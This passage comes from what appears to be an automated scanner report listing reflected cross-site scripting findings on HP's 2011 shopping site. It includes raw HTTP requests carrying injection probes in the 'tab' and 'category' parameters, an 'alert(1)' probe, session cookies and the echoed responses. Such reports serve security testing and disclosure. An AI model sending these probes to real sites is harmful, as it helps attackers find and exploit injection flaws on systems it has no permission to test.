prop12=r602; s_var_20=re_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330058'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333031'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342102'%5D%2C%5B're_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1'%2C'1316672374381'%5D%5D; ljumpstack=%5B%5B're_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1'%2C'1316672374382'%5D%5D; hpshopping=1&user_id=mlkpgtuW3gh8MCnpuVDWeQyYm2vi&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb9e8a695fbc9b6831d&cart_id=1603777709; hpcompc_usen=cartExists=true; EMID=; s_depth=28; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Apdp%3Adesktops%3Arts_desktops%3Ahp%20pavilion%20p7-1020%20desktop%20pc; s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Apdp%25253Adesktops%25253Arts_desktops%25253Ahp%252520pavilion%252520p7-1020%252520desktop%252520pc%2526pidt%253D1%2526oid%253Dfunctionanonymous(e)%25257Bs_objectID%25253D%252522%25252Fwebapp%25252Fshopping%25252Fproduct_detail.do_storeName%25253Dcomputer_store%252526landing%2526oidt%253D2%2526ot%253DA%26hphqhhomktg%3D%2526pid%253Dhttp%25253A%25252F%25252Fwww.hp.com%25252Funited-states%25252Fconsumer%25252Fdigital_photography%25252Fbuying_guides%25252Faio.html%25253Fjumpid_t%25253Dreg_R1002_USEN%2526oid%253Dhttp%25253A%25252F%25252Fwww.shopping.hp.com%25252Fwebapp%25252Fshopping%25252Fstore_access.do%25253Fproduct_code%25253DCN731A%25252523B1H%252526template_type%25253Dp%2526ot%253DA

storeName=storefronts&landing=desktops&category=p7xt_series&subcat1=rts&product_code=BV704AA#ABA&catLevel=3&mc=&ajaxCall=true&tab=9b5cf"%20a%3db%20e97581269ec

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:29:26 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkoiNyT2w59Nijvv1PXcQyYmmvi&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb9e8a695fbc9b6831d&cart_id=1603777571; expires=Friday, 20-Jan-2012 01:29:25 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:29:25 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 206699

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hp
...[SNIP]...
<input type="hidden" name="nextPage" value="/product_detail.do?storeName=storefronts&landing=desktops&category=p7xt_series&subcat1=rts&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=9b5cf" a=b e97581269ec&fromPage=/shopping/product_detail.do">
...[SNIP]...

1.53. http://www.shopping.hp.com/webapp/shopping/product_detail.do [tab parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_detail.do

Issue detail

The value of the tab request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eeb3d"%3b7e30e750a3a was submitted in the tab parameter. This input was echoed as eeb3d";7e30e750a3a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /webapp/shopping/product_detail.do HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Content-Length: 137
Origin: http://www.shopping.hp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.shopping.hp.com/webapp/shopping/product_detail.do?storeName=computer_store&landing=desktops&category=p7xt_series&subcat1=rts&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData=549e5%2527%253balert%25281%2529%252f%252f9d266d5f0bd
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; HP_EBUS=true; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330059'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333032'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342103'%5D%5D; prop12=r602; s_var_20=re_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330058'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333031'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342102'%5D%2C%5B're_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1'%2C'1316672374381'%5D%5D; ljumpstack=%5B%5B're_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1'%2C'1316672374382'%5D%5D; hpshopping=1&user_id=mlkpgtuW3gh8MCnpuVDWeQyYm2vi&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb9e8a695fbc9b6831d&cart_id=1603777709; hpcompc_usen=cartExists=true; EMID=; s_depth=28; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Apdp%3Adesktops%3Arts_desktops%3Ahp%20pavilion%20p7-1020%20desktop%20pc; s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Apdp%25253Adesktops%25253Arts_desktops%25253Ahp%252520pavilion%252520p7-1020%252520desktop%252520pc%2526pidt%253D1%2526oid%253Dfunctionanonymous(e)%25257Bs_objectID%25253D%252522%25252Fwebapp%25252Fshopping%25252Fproduct_detail.do_storeName%25253Dcomputer_store%252526landing%2526oidt%253D2%2526ot%253DA%26hphqhhomktg%3D%2526pid%253Dhttp%25253A%25252F%25252Fwww.hp.com%25252Funited-states%25252Fconsumer%25252Fdigital_photography%25252Fbuying_guides%25252Faio.html%25253Fjumpid_t%25253Dreg_R1002_USEN%2526oid%253Dhttp%25253A%25252F%25252Fwww.shopping.hp.com%25252Fwebapp%25252Fshopping%25252Fstore_access.do%25253Fproduct_code%25253DCN731A%25252523B1H%252526template_type%25253Dp%2526ot%253DA

storeName=storefronts&landing=desktops&category=p7xt_series&subcat1=rts&product_code=BV704AA#ABA&catLevel=3&mc=&ajaxCall=true&tab=eeb3d"%3b7e30e750a3a

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:29:29 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkoiNyT2w59Nijvv1PXcQyYmmvi&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb9e8a695fbc9b6831d&cart_id=1603777571; expires=Friday, 20-Jan-2012 01:29:28 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:29:28 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 223239

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hp
...[SNIP]...
<landing|category|cat level|subcat1;sku;;>
var tabValue = "eeb3d";7e30e750a3a";
if ( tabValue.indexOf("reviews") >
...[SNIP]...

1.54. http://www.shopping.hp.com/webapp/shopping/product_detail.do [tab parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_detail.do

Issue detail

The value of the tab request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c44a"%3b2775de656cc was submitted in the tab parameter. This input was echoed as 4c44a";2775de656cc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webapp/shopping/product_detail.do?storeName=computer_store&landing=desktops&category=p7xt_series&subcat1=rts&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=4c44a"%3b2775de656cc&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData= HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; prop12=r602; hpshopping=1&user_id=mlkvid2S2AhwMy3quFbXdAbTng%3D%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; hpcompc_usen=cartExists=false; EMID=; s_depth=18; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Asubcategory%3Ap7xt%20series; s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Asubcategory%25253Ap7xt%252520series%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AitemAdded('ADD_14182135_TO_CART'%25252C'SUBMIT_14182135_IMAGE'%25252C'big'%25252C'2'%2526oidt%253D2%2526ot%253DBUTTON; HP_EBUS_HP_CLICKS=4x16x6397

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:11:04 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkog96V2A1%2FMS3vu1XWdAKd0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb978573aea6e9e5a11&cart_id=1603777571; expires=Friday, 20-Jan-2012 01:11:04 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:11:04 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 207114

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hp
...[SNIP]...
<landing|category|cat level|subcat1;sku;;>
var tabValue = "4c44a";2775de656cc";
if ( tabValue.indexOf("reviews") >
...[SNIP]...

1.55. http://www.shopping.hp.com/webapp/shopping/product_detail.do [tab parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_detail.do

Issue detail

The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1666"%20a%3db%20cc350728bb1 was submitted in the tab parameter. This input was echoed as a1666" a=b cc350728bb1 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /webapp/shopping/product_detail.do?storeName=computer_store&landing=desktops&category=p7xt_series&subcat1=rts&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=a1666"%20a%3db%20cc350728bb1&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData= HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; prop12=r602; hpshopping=1&user_id=mlkvid2S2AhwMy3quFbXdAbTng%3D%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; hpcompc_usen=cartExists=false; EMID=; s_depth=18; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Asubcategory%3Ap7xt%20series; s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Asubcategory%25253Ap7xt%252520series%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AitemAdded('ADD_14182135_TO_CART'%25252C'SUBMIT_14182135_IMAGE'%25252C'big'%25252C'2'%2526oidt%253D2%2526ot%253DBUTTON; HP_EBUS_HP_CLICKS=4x16x6397

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:11:01 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: HHOJSID=n6npT6LGvyTl7004jygl2bzvh5H4dkMQBgxJNyjvjzzr7LTVLB4Y!1290690217; expires=Friday, 23-Sep-2011 01:11:00 GMT; path=/
Set-Cookie: hpshopping=1&user_id=mlkog96V2A1%2FMS3vu1XWdAKd0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb978573aea6e9e5a11&cart_id=1603777571; expires=Friday, 20-Jan-2012 01:11:00 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:11:00 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 207142

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hp
...[SNIP]...
<input type="hidden" name="nextPage" value="/product_detail.do?storeName=computer_store&landing=desktops&category=p7xt_series&subcat1=rts&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=a1666" a=b cc350728bb1&fromPage=/shopping/product_detail.do">
...[SNIP]...

1.56. http://www.shopping.hp.com/webapp/shopping/store_access.do [category parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/store_access.do

Issue detail

The value of the category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1646f"a%3d"b"7e9af0dbff6 was submitted in the category parameter. This input was echoed as 1646f"a="b"7e9af0dbff6 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /webapp/shopping/store_access.do?template_type=series_detail&category=desktops1646f"a%3d"b"7e9af0dbff6&series_name=p7xt_series&jumpid=in_R329_prodexp/hhoslp/psg/desktops/promo_tile/1/dt_promo_tile1_Budget_Friendly_921 HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/desktops;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_desktops_home4923e'%3b1cd62d1ca9e
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; hpshopping=1&user_id=mlkqgtqf2Qt7MiHjv1bYeQeXlmvi; hpcompc_usen=cartExists=false; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e'%3B1cd62d1ca9e; hp_cust_seg_sel=HHO; gpv_pN=no%20value; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949238'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953100'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949239'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953101'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%5D; lang=en-us; cc=us; prop12=r602; EMID=; s_depth=14; s_cc=true; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; HP_EBUS_HP_CLICKS=4x12x2345; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhttp%25253A%25252F%25252Fwww.shopping.hp.com%25252Fdesktops%25253BHHOJSID%25253DHWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182%25253Fjumpid_t%25253Din_R329_prodexp%25252Fhhoslp%25252Fpsg%25252Flateralnav_desktops_home4923e'%2525253b1cd62d1ca9e%2526oid%253D%25252Fwebapp%25252Fshopping%25252Fstore_access.do_template_type%25253Dseries_detail%252526category%25253Ddesktops%252526series_name%25253Dp7xt_s_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1%26hphqhhomktg%3D%2526pid%253Dhho%25257CEC%25257Cus%25257Cen%25257CFlash%252520%25253A%252520Main%252520%25253A%252520%252520Whats%252520hot%252520%25253A%252520Feature%2525201%252520%25253A%252520HP%252520Coolsense%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fh71036.www7.hp.com%25252Fhho%25252Fus%25252Fen%25252Fpclc%25252Farticles%25252Fcoolsense-technology.html%2526ot%253DA

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:00:49 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkug9GW0Qp%2BMC7tvlvadgKe0ic%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; expires=Friday, 20-Jan-2012 01:00:50 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 01:00:50 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 142501

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hps
...[SNIP]...
